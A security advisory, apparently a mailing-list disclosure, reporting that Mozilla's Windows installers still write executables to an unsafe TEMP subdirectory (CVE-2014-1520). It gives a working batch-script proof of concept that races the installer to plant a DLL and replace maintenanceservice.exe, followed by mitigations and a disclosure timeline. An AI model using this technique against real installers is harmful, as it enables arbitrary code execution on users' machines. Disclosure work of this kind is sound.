Hi @ll,
<https://bugzilla.mozilla.org/show_bug.cgi?id=961676> should
have fixed CVE-2014-1520 in Mozilla's executable installers for
Windows ... but does NOT!
JFTR: this type of vulnerability (really: a bloody stupid trivial
beginner's error!) is well-known and well-documented as
<https://cwe.mitre.org/data/definitions/379.html>.
Proof of concept/demonstration:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
0. download "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
"Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"
and save them in an arbitrary directory;
1. download <http://home.arcor.de/skanthak/download/SHFOLDER.DLL>
plus <http://home.arcor.de/skanthak/download/SENTINEL.EXE> and
save them in an(other) arbitrary directory;
2. start your editor, copy and paste the following 10 lines and
save them as "POC.CMD" in the same directory as "SHFOLDER.DLL"
and "SENTINEL.EXE" downloaded in step 1:
:WAIT1
@If Not Exist "%TEMP%\7z*.tmp" Goto :WAIT1
For /D %%! In ("%TEMP%\7z*.tmp") Do Set foobar=%%!
Copy "%~dp0shfolder.dll" "%foobar%\shfolder.dll"
:WAIT2
@If Not Exist "%foobar%\core\maintenanceservice.exe" Goto :WAIT2
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice.exe"
:WAIT3
@If Not Exist "%foobar%\core\maintenanceservice_installer.exe" Goto :WAIT3
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice_installer.exe"
3. execute the batch script "POC.CMD" created in step 2;
4. execute "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
"Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"
downloaded in step 0. and proceed as directed: notice the message
boxed displayed from the copies of "SHFOLDER.DLL" and "SENTINEL.EXE"
placed by the batch script started in step 3 in the unsafe TEMP
subdirectory created by Mozilla's vulnerable executable installers!
PWNED!
Mitigation(s):
~~~~~~~~~~~~~~
0. don't use executable installers. DUMP THEM, NOW!
1. see <http://home.arcor.de/skanthak/!execute.html> as well as
<http://home.arcor.de/skanthak/SAFER.html>.
2. stay away from Mozilla's vulnerable installers for their Windows
software (at least until Mozilla starts to develop a sense for
the safety and security of their users).
stay tuned
Stefan Kanthak
Timeline:
~~~~~~~~~
2015-10-25 <https://bugzilla.mozilla.org/show_bug.cgi?id=1218199>
not even an attempt to fix this vulnerability (check but
<https://blog.mozilla.org/blog/2015/10/23/mozilla-launches-open-source-support-program/>)
2016-04-30 <https://bugzilla.mozilla.org/show_bug.cgi?id=1269111>
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269113>
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269122>
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269123>
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269142>
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269144>
not even an attempt to fix this vulnerability (check but
<https://blog.mozilla.org/blog/2016/06/09/help-make-open-source-secure/>)
2016-06-15 deadline expired after 45 days, report published